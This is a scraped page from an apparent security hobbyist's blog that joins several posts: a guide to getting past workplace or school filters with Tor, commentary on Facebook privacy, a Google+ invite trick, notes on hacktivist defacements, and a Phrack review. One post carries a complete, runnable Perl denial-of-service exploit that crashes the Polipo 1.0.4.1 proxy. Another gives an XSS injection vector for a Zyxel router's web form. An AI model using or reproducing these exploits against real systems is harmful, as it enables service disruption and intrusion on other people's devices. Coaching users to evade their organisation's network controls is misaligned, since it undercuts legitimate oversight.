Disclaimer: All the material shown on this blog is for educational purposes ! We would not be held responsible for any illegal use of the material by any one !

Usually what happens is that people want to visit a website , which is legit , but some how it is listed in the document given to a naive network administrator and you want to download important stuff from it but what the hell , ITS BLOCKED !!!!!!!!  Your boss , teacher or any person whom you report to , doesn’t want hear stuff about BLOCKED SITES !! Its totally lame to them because they want results and you didn’t deliver. This is a very normal problem faced by many employees , students , etc.

First of all you would have to know a little about “Tunnel” . For that please check out my post about Tunneling because your concept of how tunneling works should be very clear. Today I would tell you how one can bypass these filters.

Tor stands for The Onion Router. This was at first created by the US Naval Research Laboratory a long time ago but then was handed over to the people for commercial use ! Though alot of funding is still coming from the US Govt, and alot of other parties. Which is a pretty good thing because TOR was initially designed for anonymity. The goal was that the users would be anonymous over the internet , thus becoming less of a target for the hackers but back then ” Drive By Malware/Exploits ” were not in mind or yet discovered.

In this blog I would cover the bypassing of filters so anonymity is not the main focus.Ok  how it works is that first you goto the link and download the Vidalia Bundle . Then once downloaded, install the software and all its components.

After installation run the Vidalia executable. Wait for its icon on the tray of the taskbar, to  the right, to become Green. Once that is done , goto the browser’s network option and add following values in the coinciding variables fields :

Proxy Address : 127.0.0.1

Proxy Port : 8118

Ok now save the settings and get out of the options/settings by clicking on OK !

Now your good to go ! To check whether the proxy is working or not goto : What is my IP (dot) com and see your IP Address. For cross checking whether the proxy is working or not , before adding the proxy settings to your browser goto the above mentioned website and note your IP Address and then compare it with the latter!

Enjoy ! If for instance your ISP or Administrator is smart enough to some how block the tor network, goto the TOR control panel and the click the settings button and then goto the netwok tab, it would be something like this :

If you use a proxy to access the internet , usually which is the case in Universities and Offices so this is the option to give proxy to TOR:

There are a few other techniques you could use to bypass the filters , but this one is by far the best.

Peace.
Follow @Xc0resecurity

Hello every one ! Here I am , again criticizing Facebook !  What can I say ? There is so much going on with Facebook that one can write  and  write and keep on writing ! Though its a great publicity stunt , in other words I am helping more people join Facebook by criticizing it again and again ! This is usually called Negative Publicity , but what the hell Facebook doesn’t need my help to get people now does it ?!

Well whats happening is that the whole world is converging to this social network concept . In offices , unless it is blocked , people stay logged into Facebook , the whole time.  First of all I would like to explain what datamining is  , for all the people who aren’t familiar with the term?  Data Mining is , in a nutshell , process of collecting and harvesting data from different sources and then storing the data  to find patterns. Facebook has suddenly started to act very weird. The algorithms used , try to find out the most deepest darkest secret by asking strange questions. For example my album’s picture pops up and I am asked for the location of the album. Why the hell would I want to enter that?

Similarly if we notice , we can see that at first what we entered as random captions , now get saved into specific variables of the backend database. For instance we used to set the caption of a picture as “Me and my bro at moms place” , now  Facebooks asks , “Where was this photo taken” “Who were you with” “Caption” ! Now for any programmer or a person who knows how searching can be made efficient , isnt this the faster way to find out stuff ? Or is extracting data from a caption more easy?  Its for you to think .

Lastly Facebook is going to a great length to , not letting its users leave Facebook.  You would probably be wondering “ahan ! for example ….” ,well try deleting your account from the Accounts option in the top right corner (as is in the current version of Facebook) .

Now to delete the account permanently with every thing including pictures , albums etc go onto the following link !

http://www.facebook.com/help/contact.php?show_form=delete_account , Click Submit !

Notice that the form is displayed through the contact.php’s parameter (show_form)!  Now who in the world would have guessed that?

If we sneak peak into the future , then it can safely be said that in the near future , law enforcement agencies would not require  high tech  surveillance  equipment to track any body or get evidence or any thing for that matter , they would just check the Facebook account of that user and a treasure of information would be visible to them.  Pattern recognition is currently going on but not on a very large scale .

Its Some thing to think about.

Peace !

Follow @Xc0resecurity

Polipo is a proxy server that is used with TOR (The onion router) vidalia bundle.If we speak in a very abstract and non technical manner then we can say that Polipo routes user’s browser traffic to the tor network. The user has to just give the port number (8118 in case of TOR).

The software’s download page and the exploit code  is as follows:

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]
# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: [1.0.4.1]
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description  : By sending a crafted POST/PUT request to the server,
 the proxy server crashes !
[*] Exploitation :

#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];

$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed  \n";
$res = recv($sock,$response,1024,0);
print $response;

exit;

#------------------------------

[ Disclaimer: All the material shown on this website is for educational purposes ! We would not be held responsible for any illegal use of the material by any one ! ]

Google+ the new buzz in town !! I see every one on Facebook , commenting about Google+. What is Google+ ? Well it is a social networking project by Google. It has alot of very nice features. Though its not mature enough but still the limited release is very nice. As it is a limited version so even if you Invite some one , they would go up on the page and it would not let you get in . A message saying that the limit has been exceeded.

Today Mr. Usman Ahmed and Mr. Ali Raza Khuwaja  , friends of mine  who are  Penetration Testers working with me , found a work around for inviting people for sure. The fun thing is that it has a 100% success rate uptil now.

The bug found , basically takes advantage of the Circles feature. If you directly send the invite , their would be a problem but if you goto your Home page and in your update section Write any update and just beneath it is an option for adding a Circle (group) to whom the update would be visible to. Write the email address of the Gmail person  as a Circle and post it.

After a while your friend would receive a mail saying:

<< Update on Google+ >>
[Hyper link to Google+] ==>  View or comment on <<Your Name>> post »
The Google+ project is currently working out all the kinks with a small group of testers. If you’re not able to access Google+, please check again soon.

Just click on the hyperlink and your in.

Peace !!!

Today I would like to tell you some thing that I noticed a while back in our favorite hangout spot , Facebook ! In today’s world there is nothing that can be called plain and simple.Every thing from Google Search results to Facebook’s friends feeds , are controlled by Algorithms that basically, in simple words control how you see the information.

In Facebook what happens is that it detects and stores your Clicks. Clicks could be any thing ranging from clicking on the like button on some friend’s video or status or comment.Similarly it creates trends of users , for example usually you see that the advertisements shown on your home page are different then that of your friend’s home page. This was harmless and sometimes helped the user to find something of interest in those ads.

Now the scary part. Currently in Facebook what is happening is that those friends with whom u get out of touch on Facebook as in don’t tag them or post any thing on their wall or perform any kind of activity , are automatically removed from the news feeds on your home page.That is you wont see any updates from that friend and you would think that the friend is not using his/her’s Facebook. When in actuality Facebook decided for you whom to see in your feeds and whom not to see.

So I am forced to ask that is Facebook becoming intelligent or is it deceiving us?

Now this for you all to decide!

Peace !!!

The most Prominent of all is created by the guy who is the part of Indian Cyber Army (unofficial) called The Hacker News and what happens is that they deface any high valued website of Pakistan or around the world and then posts it onto their website as a news. Though they also post websites posted by other hackers but maximum websites posted by hacker news are by the Indian Cyber Army(unofficial).

The funny thing is that most of the lists are fake.Some times they deliberately give links of some website ,which is their target , as a challenge ,thus they dont have to get their hands dirty and the server gets compromised.

An Indian Hacker called Zero , compromised servers of Pakistan and posted the list onto yet another site : Voice of Grey hat

The Strangest thing is that China , Russia and many other countries have created their Cyber Armies.Some of the hackers which are the part of these Cyber Armies start these kinds of websites which is by law totally wrong.

These were some examples of Cyber Deception , there are many more.

Peace out!!!

Infection is pretty easy you watch the video , it has an embedded malware attached to it and it gets downloaded and executed on your PC. On the other hand how its spreading is that when you click on the link it takes you to a rogue application and then the application gets the list of your facebook friends and starts posting the video link on the wall of your friends.

These kinds of events are paradise for Scammers , Spammers , Crackers etc. The best thing to protect ones self is to either use a very good AV in combination with a great antiMalware software and a personal firewall.

Again I would recommend not to click on any link related to OSAMA’s Death.

Peace.

Peace out !!!!! *listening to Sepultura*

Yeah the Ezine can be found any where on the internet !!
http://packetstormsecurity.org/files/view/97044/owned-and-exposed-2.txt and at many other places !!!

I recently found a vulnerability in Zyxel P-660R T1 . Although the impact factor is quite low as it is an XSS (Cross site scripting) but still  a vulnerability is a vulnerability .

Xc0re Security Research Group

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

Exploit:

VECTOR : http://IP/Forms/home_1?&HomeCurrent_Date=‘ XSS Vector ‘01%2F01%2F2000

This works with the post request too ! As by default this value is sent through POST request.

Author : Usman Saeed , Xc0re Security Research Group.

Phrack team had alot of problem (apparently) before the release of this Issue of Phrack !  I dont know the exact issues but still they delayed it many times.  The whole team is different for issue 67 ! Maybe that was the problem ? Well the authors of Phrack 67 would be knowing that better.

All in all it was an ok release ! But if compared with the past releases , it was nothing !! I hope another issue comes out soon ! Maybe even this year !

Peace !